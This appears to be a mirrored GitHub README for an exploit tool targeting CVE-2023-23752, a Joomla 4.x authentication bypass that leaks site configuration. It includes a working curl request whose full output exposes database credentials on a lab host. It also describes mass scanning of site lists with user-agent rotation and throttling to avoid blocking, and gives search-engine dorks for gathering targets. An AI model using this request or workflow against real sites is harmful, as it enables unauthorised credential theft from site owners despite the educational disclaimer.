来源

关联漏洞

描述

Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).

介绍

# CVE-2023-23752
Exploit for CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7).


## Introduction
As discussed, CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:
```bash
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
*   Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
```
In the proof of concept above, the server responds with the credentials root:labpass1, which are the credentials for our test Joomla! MySQL account. But it’s important to know that our test MySQL server was bound to 127.0.0.1, so the remote attacker can’t access the server, making the credentials mostly useless. Binding MySQL to the localhost should be the most common configuration, which severely limits this credential leak.


## Disclaimer: Educational Purpose Only

This Exploit and Proof of Concept (PoC) is presented solely for educational and informational purposes. The intent behind sharing this is to demonstrate potential vulnerabilities in a controlled environment. The goal is to promote understanding of cybersecurity concepts and encourage responsible disclosure.

### Important Points:
- **Ethical Use:** This Exploit and PoC should only be used in environments and systems where you have explicit authorization. Unauthorized access to computer systems is illegal and unethical.
- **Responsible Disclosure:** If you discover vulnerabilities as a result of this Exploit and PoC, it is strongly recommended to report them responsibly to the relevant parties, allowing them adequate time to address and mitigate the issues.
- **No Endorsement:** This PoC and related materials do not endorse or encourage any form of unauthorized access, hacking, or any other illegal activities.

By accessing and using this Exploit and PoC, you acknowledge that you are solely responsible for your actions and agree to use this information in compliance with applicable laws and regulations. The author assumes no liability for any misuse or consequences arising from the use of this PoC for any purpose other than education and responsible disclosure.

## Exploit Features
- **SINGLE SCAN:** Scanning a single site for Exploit.
- **MASS SCAN:** Scanning list of site from a file for Exploit.
- **ASYNCHRONOUS Threading:** Using Threads for fast processing.
- **DYNAMIC THROTTLING:** Implement a dynamic request throttling technique to avoid sending too many requests quickly, which can assist avoid getting blocked.
- **RESULT SUMMARISATION:** Summarise the findings at the conclusion of the scan, giving data on successful scans, unsuccessful scans, and any problems that were detected.
- **INPUT VALIDATION:** Implement input validation to make sure that user inputs, particularly those from files, are correctly structured and contain legitimate URLs.
- **USER-AGENT ROTATION:** Rotate the User-Agent header for each request to mimic different browsers and reduce the chance of being blocked.
## Getting Started

### Prerequisites

- Python 3.x
- Required Python packages: `requests`, `colorama` , `urllib3` , `fake_useragent` , `aio-http`

### Installation

1. Clone the repository:

    ```bash
    git clone https://github.com/Pushkarup/CVE-2023-23752.git
    cd CVE-2023-23752
    ```

2. Install the required Python packages:

    ```bash
    pip install -r requirements.txt
    ```

## Usage


1. Create a text file containing the target sites (one per line) and save it with a `.txt` extension.
 - Collect site list for test using dork `inurl:/api/index.php/v1/config/application?public=true` , `intitle:"Index of" /api/index.php/v1/config/application?public=true` , `filetype:php inurl:/api/index.php/v1/config/application?public=true` , `intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"`

2. Run the script:

    ```bash
    python joomla.py
    ```

3. Let the script run its course and follow the directions.
   
4. Every site that has been exploited will be stored to Results.txt.
   

## Contributing

Contributions are welcome! If you find any issues or have improvements, feel free to open a pull request or create an issue.

## License

This project is licensed under the [MIT License](LICENSE).


## Contact

- GitHub: [Pushkar Upadhyay](https://github.com/Pushkarup)
- LinkedIn: [Pushkar Upadhyay](www.linkedin.com/in/pushkar-upadhyay-24p)

## Donations
### Show your support
- BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP
- ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a
- USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a

文件快照

 [4.0K]  /data/pocs/22553cdb0327e36fa3c965c1e4fa86b129df2fb8
├── [5.4K]  joomla.py
├── [1.0K]  LICENSE
├── [7.3K]  README.md
└── [  74]  requirements.txt

0 directories, 4 files

备注